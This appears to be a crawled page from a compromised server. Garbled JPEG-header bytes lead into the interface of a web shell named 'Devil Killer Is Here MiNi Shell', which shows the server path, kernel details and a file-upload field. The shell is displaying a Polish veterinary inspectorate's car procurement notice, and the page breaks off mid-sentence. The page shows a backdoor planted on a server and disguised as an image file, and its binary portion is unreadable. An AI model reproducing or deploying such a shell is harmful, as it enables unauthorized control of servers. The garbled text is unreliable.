JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250926/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250926/0044467601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa w podziale na części fabrycznie nowych samochodów osobowych <br/>o napędzie spalinowym na potrzeby Głównego Inspektoratu Weterynarii </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Inspekcja Weterynaryjna Główny Inspektorat Weterynarii</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013298660</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wspólna 30</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-930</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sebastian.klodkowski@giw.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wetgiw.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Weterynaria </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa w podziale na części fabrycznie nowych samochodów osobowych <br/>o napędzie spalinowym na potrzeby Głównego Inspektoratu Weterynarii </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c95310fe-3279-49af-8df1-83345493e4f1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00444676</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00133105/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa w podziale na części fabrycznie nowych samochodów osobowych o napędzie spalinowym na potrzeby Głównego Inspektoratu Weterynarii</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c95310fe-3279-49af-8df1-83345493e4f1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się za pośrednictwem Platformy ezamówienia,<br/>która jest dostępna pod adresem https://ezamowienia.gov.pl. Szczegółowe informacje w zakresie wymagań<br/>technicznych i organizacyjnych dot. korespondencji elektronicznej zostały wskazane w Rozdziale 10 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Główny Inspektorat Weterynarii (zwany dalej „GIW”) z siedzibą w Warszawie przy ul.<br/>Wspólnej 30, 00-930 Warszawa przetwarza dane zawarte w ofertach, znajdujące się w publicznie dostępnych rejestrach (Krajowy<br/>Rejestr Sądowy, Centralna Ewidencja i Informacja<br/>o Działalności Gospodarczej) w celu prowadzenia postępowań o udzielenie zamówień publicznych na postawie przepisów ustawy z<br/>dnia 11 września 2019 r. - Prawo zamówień publicznych (Dz. U. z 2022 r. poz. 1710, z późn. zm.) (zwanej dalej „ustawa Pzp”).<br/>Wśród tych informacji mogą pojawić się dane, które na gruncie rozporządzenia Parlamentu Europejskiego i Rady Unii Europejskiej<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (dalej: „Ogólne Rozporządzenie” lub „RODO”), mają<br/>charakter danych osobowych. Dodatkowe informacje w tym zakresie zostały zamieszczone w Rozdziale 2 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje w tym zakresie zostały zamieszczone w Rozdziale 2 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BP.240.1.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 471544,72 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 471544,71 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I – dostawa fabrycznie nowego Pojazdu (Typ I) o napędzie spalinowym (benzynowym) o minimalnych parametrach technicznych wskazanych w Załączniku numer 1A do SWZ - Szczegółowym Opisie Przedmiotu Zamówienia. Dodatkowe wymagania Zamawiającego oraz informacje dotyczące wymagań związanych z realizacją przedmiotu zamówienia w części I zamówienia zostały wskazane także w Załączniku numer 2 do SWZ - proponowanych postanowieniach umowy. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 260162,60 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34110000-1 - Samochody osobowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34100000-8 - Pojazdy silnikowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1) Zamawiający na podstawie art. 441 ustawy Pzp, przewiduje zastosowanie prawa opcji poprzez możliwość realizacji dodatkowych dostaw lub wykonania dodatkowych usług związanych z oferowanym Pojazdem w okresie od dnia zawarcia umowy do momentu odbioru oferowanego auta, na zasadach szczegółowych określonych w § 7 proponowanych postanowień umowy;<br/>2) Realizacja prawa opcji polegać będzie na:<br/>a) realizacji ewentualnych dodatkowych dostaw wyposażenia lub akcesoriów wraz z montażem (jeśli, jest niezbędny ich montaż przez ASO) w szczególności: dodatkowego kompletu kół, haka holowniczego lub innych oferowanych przez Wykonawcę dodatkowych akcesoriów dedykowanych do oferowanego Pojazdu, lub<br/>b) realizacji ewentualnych dodatkowych usług dotyczących oferowanego Pojazdu, w tym w szczególności: związanych z dodatkowym zabezpieczeniem antykorozyjnym podwozia, nadwozia Pojazdu, lub np. montaż haka, ewentualnie wykupienie dodatkowych usług serwisowych w tym np. pakietów usług serwisowych Pojazdu, o ile Wykonawca lub Producent pojazdu oferuje taką możliwość.<br/>3) Ewentualna realizacja prawa opcji odbywać się będzie wyłącznie w przypadku, gdy Zamawiający wyrazi wolę zakupu dodatkowych usług lub dostaw na warunkach określonych przez Wykonawcę. Jeśli Zamawiający zaakceptuje przedstawione przez Wykonawcę warunki realizacji dodatkowych usług lub dostaw (tj. cenę, termin i sposób realizacji dostawy lub usługi), to Wykonawca będzie zobowiązany do ich realizacji na uzgodnionych warunkach, zgodnie z postanowieniami § 7 projektu umowy;<br/>4) Maksymalna wartość ewentualnej realizacji dodatkowych dostaw lub usług<br/>w ramach prawa opcji nie może łącznie przekroczyć 10% wartości zamówienia podstawowego;<br/>5) Zamawiający nie ma obowiązku korzystać z prawa opcji. Wykonawcy nie przysługuje jakiekolwiek roszczenie z tytułu nieskorzystania przez Zamawiającego z prawa opcji albo skorzystania z niego w częściowym zakresie, niewyczerpującym kwoty maksymalnej. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert dla każdej z części zamówienia oddzielnie będzie dokonywana według skali punktowej, przy założeniu, że maksymalna punktacja wynosi 100 punktów. Punktacja przyznana ofercie Wykonawcy będzie sumą punktacji<br/>uzyskanej w każdym z niżej wymienionych kryteriów, odrębnych dla każdej z części zamówienia. Punkty w kryterium oceny ofert dla części I zamówienia zostaną przyznane na podstawie informacji wskazanych przez Wykonawców w Formularzu oferty (załącznik numer 3A do SWZ).<br/>Zamawiający dokona oceny ofert w części I zamówienia: Dostawa Pojazdu o napędzie spalinowym (benzyna) - Typ I, które nie zostały odrzucone, na podstawie następujących dwóch kryteriów oceny ofert:<br/>1) Cena (C1) - znaczenie kryterium maksymalnie 60 pkt.<br/>2) Średnia długość Gwarancji w miesiącach (SDG1) - znaczenie kryterium maksymalnie 40 pkt.<br/>Szczegółowy opis kryteriów oceny ofert dla części I zamówienia został wskazany w Rozdziale 16 ust. 3-7 SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Średnia długość Gwarancji w miesiącach (SDG1)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II – dostawa fabrycznie nowego Pojazdu (Typ II) o napędzie spalinowym (benzyna/diesel) o minimalnych parametrach technicznych wskazanych w Załączniku numer 1B do SWZ - Szczegółowym Opisie Przedmiotu Zamówienia. Dodatkowe wymagania Zamawiającego oraz informacje dotyczące wymagań związanych z realizacją przedmiotu zamówienia zostały wskazane także w Załączniku numer 2 do SWZ - proponowanych postanowieniach umowy. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 211382,11 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34110000-1 - Samochody osobowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34100000-8 - Pojazdy silnikowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1) Zamawiający na podstawie art. 441 ustawy Pzp, przewiduje zastosowanie prawa opcji poprzez możliwość realizacji dodatkowych dostaw lub wykonania dodatkowych usług związanych z oferowanym Pojazdem w okresie od dnia zawarcia umowy do momentu odbioru oferowanego auta, na zasadach szczegółowych określonych w § 7 proponowanych postanowień umowy;<br/>2) Realizacja prawa opcji polegać będzie na:<br/>a) realizacji ewentualnych dodatkowych dostaw wyposażenia lub akcesoriów wraz z montażem (jeśli, jest niezbędny ich montaż przez ASO) w szczególności: dodatkowego kompletu kół, haka holowniczego lub innych oferowanych przez Wykonawcę dodatkowych akcesoriów dedykowanych do oferowanego Pojazdu, lub<br/>b) realizacji ewentualnych dodatkowych usług dotyczących oferowanego Pojazdu, w tym w szczególności: związanych z dodatkowym zabezpieczeniem antykorozyjnym podwozia, nadwozia Pojazdu, lub np. montaż haka, ewentualnie wykupienie dodatkowych usług serwisowych w tym np. pakietów usług serwisowych Pojazdu, o ile Wykonawca lub Producent pojazdu oferuje taką możliwość.<br/>3) Ewentualna realizacja prawa opcji odbywać się będzie wyłącznie w przypadku, gdy Zamawiający wyrazi wolę zakupu dodatkowych usług lub dostaw na warunkach określonych przez Wykonawcę. Jeśli Zamawiający zaakceptuje przedstawione przez Wykonawcę warunki realizacji dodatkowych usług lub dostaw (tj. cenę, termin i sposób realizacji dostawy lub usługi), to Wykonawca będzie zobowiązany do ich realizacji na uzgodnionych warunkach, zgodnie z postanowieniami § 7 projektu umowy;<br/>4) Maksymalna wartość ewentualnej realizacji dodatkowych dostaw lub usług<br/>w ramach prawa opcji nie może łącznie przekroczyć 10% wartości zamówienia podstawowego;<br/>5) Zamawiający nie ma obowiązku korzystać z prawa opcji. Wykonawcy nie przysługuje jakiekolwiek roszczenie z tytułu nieskorzystania przez Zamawiającego z prawa opcji albo skorzystania z niego w częściowym zakresie, niewyczerpującym kwoty maksymalnej. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert dla każdej z części zamówienia oddzielnie będzie dokonywana według skali punktowej, przy założeniu, że maksymalna punktacja wynosi 100 punktów. Punktacja przyznana ofercie Wykonawcy będzie sumą punktacji<br/>uzyskanej w każdym z niżej wymienionych kryteriów, odrębnych dla każdej z części zamówienia. Punkty w kryterium oceny ofert dla części II zamówienia zostaną przyznane na podstawie informacji wskazanych przez Wykonawców w Formularzu oferty (załącznik numer 3B do SWZ).<br/>Zamawiający dokona oceny ofert w części II zamówienia: Dostawa Pojazdu o napędzie spalinowym (benzyna/diesel) - Typ II, które nie zostały odrzucone, na podstawie następujących dwóch kryteriów oceny ofert:<br/>1) Cena (C2) - znaczenie kryterium maksymalnie 60 pkt.<br/>2) Średnia długość Gwarancji w miesiącach (SDG2) - znaczenie kryterium maksymalnie 40 pkt.<br/>Szczegółowy opis kryteriów oceny ofert dla części II zamówienia został wskazany w Rozdziale 16 ust. 8-12 SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Średnia długość Gwarancji w miesiącach (SDG2)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają łącznie następujące warunki udziału w postępowaniu<br/>dotyczące zdolności technicznej lub zawodowej:<br/>Wykonawcy, którzy na moment składania ofert posiadają autoryzację producenta lub importera zaoferowanego Pojazdu do<br/>jego sprzedaży w ramach oficjalnego kanału sprzedaży oraz realizowania czynności związanych z dostawą (w tym wykonywaniem przeglądu tzw. „zerowego”) zaoferowanego Pojazdu na terenie Rzeczypospolitej Polskiej (informacje w tym zakresie znajdują się w Rozdziale 5 SWZ). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wymaga złożenia wraz z ofertą wypełnionego we wszystkich wymaganych polach oraz podpisanego przez osobę lub osoby upoważnione do reprezentowania Wykonawcy oświadczenia według wzoru stanowiącego Załącznik numer 5 do SWZ o niepodleganiu wykluczeniu, spełnianiu warunku udziału w postępowaniu oraz że w stosunku do Wykonawcy nie zachodzą przesłanki wykluczenia z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>W celu potwierdzenia spełniania warunków udziału w postępowaniu w zakresie zdolności technicznej, o których mowa w Rozdziale<br/>5 ust. 1 pkt 4 lit. b SWZ, Wykonawca zobowiązany jest złożyć, wraz z ofertą, podmiotowe środki dowodowe, tj. Dokument lub dokumenty potwierdzające, że<br/>Wykonawca posiada autoryzację producenta lub importera Pojazdu do jego sprzedaży na terenie Rzeczypospolitej Polskiej w ramach oficjalnego kanału sprzedaży.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dokument lub dokumenty potwierdzające, że Wykonawca posiada autoryzację producenta lub importera Pojazdu do jego sprzedaży na terenie Rzeczypospolitej Polskiej w ramach oficjalnego kanału sprzedaży.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający żąda złożenia wraz z ofertą:<br/>a) uzupełnionego we wszystkich wymaganych polach wykazu parametrów oferowanego Pojazdu – Specyfikacji Technicznej Oferowanego Pojazdu (STOP) według wzoru stanowiącego załącznik nr 4A (dla części I: dostawy Pojazdu o napędzie spalinowym - Typ I), oraz załącznik nr 4B (dla części II: dostawy Pojazdu o napędzie spalinowym - Typ II),<br/>b) karty technicznej, specyfikacji technicznej producenta lub innego dokumentu potwierdzającego, że zaoferowany Pojazd spełnia minimalne wymagania określone w Szczegółowym Opisie Przedmiotu Zamówienia. Zamawiający dopuszcza te dokumenty sporządzone w dowolny sposób (np. wyciąg z katalogu producenta, strony internetowej z konfiguratora pojazdów etc.), pod warunkiem, że w jednoznaczny sposób potwierdzają spełnianie przez Pojazd wymagań określonych w SOPZ i potwierdzają parametry wskazane w STOP,<br/>c) dokument potwierdzający, że na zaoferowany Pojazd oferowana jest Gwarancja na okres deklarowany przez Wykonawcę w Formularzu oferty ze wskazaniem ewentualnych ograniczeń przebiegu pojazdu - minimum 150 000 km (np. warunki gwarancji, oświadczenie Gwaranta lub inne dokumenty potwierdzające okres i zakres Gwarancji wskazany przez Wykonawcę w Formularzu oferty).<br/>Ponadto Zamawiający zwraca uwagę, że wraz z ofertą Wykonawcy winni złożyć Podmiotowe środki dowodowe, o których mowa w Rozdziale 5 SWZ, oraz punkcie 5.6 i 5.7 niniejszego Ogłoszenia o zamówieniu tj. Oświadczeń (załącznik numer 5 do SWZ) oraz Dokumentu lub dokumentów potwierdzających, że Wykonawca posiada autoryzację producenta lub importera Pojazdu do jego sprzedaży na terenie Rzeczypospolitej Polskiej w<br/>ramach 